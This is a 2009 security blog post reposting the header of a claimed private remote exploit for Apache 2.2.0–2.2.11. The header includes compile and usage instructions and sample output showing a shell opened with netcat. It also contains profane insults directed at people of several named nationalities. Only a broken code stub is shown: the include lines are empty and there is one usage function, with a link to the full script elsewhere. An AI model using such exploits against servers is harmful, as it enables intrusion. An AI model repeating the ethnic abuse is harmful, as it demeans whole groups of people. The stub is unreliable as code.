Web2Secure: Web Security Blog: Apache 2.2.0

Monday, November 16, 2009

Apache 2.2.0 - 2.2.11 Remote exploit

/*  ========   !THIS 0DAY EXPLOIT IS PRIVATE PLEASE DO NOT DISTRIBUTE! =================

Apache 2.2.0 - 2.2.11 Remote exploit  Exploiting an off-by one bug in apr_uri_parse_hostinfo()

which leads to allocation of arbitrary ammount of memory, put the shellcode then reliably jump

in upon invocation  of the APR callback.

Compile: gcc fuckapache.c -o fuckapache  Usage: ./fuckapache

E.g: ===========================================================

[test@localhost tmp]$ ./fuck localhost 80 Connected, sending out the evil request...

Waiting some seconds to see if we got shell... Now type nc localhost 12345 to see if you've got shell there

[test@localhost tmp]$ nc localhost 12345 id uid=48(apache) gid=48(apache) groups=48(apache) ^D

==========================================================

==========================================================

Fuck all script kiddies around the world. No more free bugs, get lost.

Fuck all Indonesian, Malaysian, Pakistani, Saudi, Marrocan, Nigerian,
Turkish and other third-world *hack3rz* whose only contribution to the
world is writing dummy sqli scripts in python flooding the net
with BS like "kekekekeke" "ajjajaja" "i kill you". 
Feel free to suck my balls, all of you.

Have phun :)

*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void usage(char *argv[])
{
    printf("Usage: %s  \n\n",argv[0]);
    exit(1);
}

Full script can be obtained from http://pastebin.com/f5571e439

Reference: http://sebug.net/exploit/12636/[Broken Link]

Web2Secure: Web Security Blog

Pages

Monday, November 16, 2009

Apache 2.2.0 - 2.2.11 Remote exploit

0 comments: